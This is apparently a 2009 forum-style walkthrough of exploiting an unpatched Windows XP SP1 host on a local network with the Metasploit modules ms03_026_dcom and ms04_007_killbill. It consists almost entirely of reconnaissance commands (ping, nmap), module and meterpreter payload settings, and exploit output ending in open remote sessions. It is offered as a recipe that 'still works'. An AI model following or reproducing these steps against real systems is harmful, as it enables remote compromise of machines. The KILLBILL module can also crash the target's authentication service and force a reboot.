this is an old exploit but still works
i have test it on Local Area Network here
this exploit tested on Windows XP Service Pack 1
[o] DCOM RPC Exploit (ms03_026_dcom)
# Description
This module exploits a stack overflow in the RPCSS service, this
vulnerability was originally found by the Last Stage of Delirium
research group and has bee widely exploited ever since. This module
can exploit the English versions of Windows NT 4.0 SP3-6a, Windows
2000, Windows XP, and Windows 2003 all in one request :)
root@ubuntu:~# ping 172.16.1.31
PING 172.16.1.31 (172.16.1.31) 56(84) bytes of data.
64 bytes from 172.16.1.31: icmp_seq=1 ttl=128 time=2.09 ms
64 bytes from 172.16.1.31: icmp_seq=2 ttl=128 time=0.335 ms
64 bytes from 172.16.1.31: icmp_seq=3 ttl=128 time=0.342 ms
^C
--- 172.16.1.31 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2005ms
rtt min/avg/max/mdev = 0.335/0.922/2.091/0.826 ms
root@ubuntu:~# nmap -O -PN 172.16.1.31
Starting Nmap 4.62 ( http://nmap.org ) at 2009-06-21 09:56 WIT
Interesting ports on ******-******.kapukvalley.net (172.16.1.31):
Not shown: 1710 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
5000/tcp open upnp
MAC Address: 00:1C:F0:5A:98:AF (D-Link)
Device type: general purpose
Running: Microsoft Windows 2000
OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.860 seconds
root@ubuntu:~# cd /home/noge/pentest/metasploit/
root@ubuntu:/home/noge/pentest/metasploit# ./msfconsole
| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_|
=[ msf v3.3-dev
+ -- --=[ 378 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 154 aux
msf > use windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms03_026_dcom) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 135 yes The target port
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal
msf exploit(ms03_026_dcom) > set RHOST 172.16.1.31
RHOST => 172.16.1.31
msf exploit(ms03_026_dcom) > set TARGET 0
TARGET => 0
msf exploit(ms03_026_dcom) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.1.31 yes The target address
RPORT 135 yes The target port
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST 172.16.1.31 no The target address
Exploit target:
Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal
msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ...
[*] Sending exploit ...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] The DCERPC service did not reply to our request
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (172.16.1.12:38423 -> 172.16.1.31:4444)
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > sysinfo
Computer: ******-******
OS : Windows XP (Build 2600, Service Pack 1).
meterpreter >
=============================================================================================
=============================================================================================
[o] KILLBILL SMB Exploit (ms04_007_killbill)
# Description
This is an exploit for a previously undisclosed vulnerability in the
bit string decoding code in the Microsoft ASN.1 library. This
vulnerability is not related to the bit string vulnerability
described in eEye advisory AD20040210-2. Both vulnerabilities were
fixed in the MS04-007 patch. You are only allowed one attempt with
this vulnerability. If the payload fails to execute, the LSASS
system service will crash and the target system will automatically
reboot itself in 60 seconds. If the payload succeeeds, the system
will no longer be able to process authentication requests, denying
all attempts to login through SMB or at the console. A reboot is
required to restore proper functioning of an exploited system. This
exploit has been successfully tested with the win32/*/reverse_tcp
payloads, however a few problems were encounted when using the
equivalent bind payloads. Your mileage may vary.
msf > use windows/smb/ms04_007_killbill
msf exploit(ms04_007_killbill) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms04_007_killbill) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
PROTO smb yes Which protocol to use: http or smb
RHOST yes The target address
RPORT 445 yes Set the SMB service port
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1
msf exploit(ms04_007_killbill) > set RHOST 172.16.1.31
RHOST => 172.16.1.31
msf exploit(ms04_007_killbill) > show targets
Exploit targets:
Id Name
-- ----
0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1
msf exploit(ms04_007_killbill) > set TARGET 0
TARGET => 0
msf exploit(ms04_007_killbill) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
PROTO smb yes Which protocol to use: http or smb
RHOST 172.16.1.31 yes The target address
RPORT 445 yes Set the SMB service port
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST 172.16.1.31 no The target address
Exploit target:
Id Name
-- ----
0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1
msf exploit(ms04_007_killbill) > exploit
[*] Started bind handler
[*] Error: The server responded with error: STATUS_ACCESS_VIOLATION (Command=115 WordCount=0)
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (172.16.1.12:33484 -> 172.16.1.31:4444)
meterpreter > sysinfo
Computer: ******-******
OS : Windows XP (Build 2600, Service Pack 1).
meterpreter >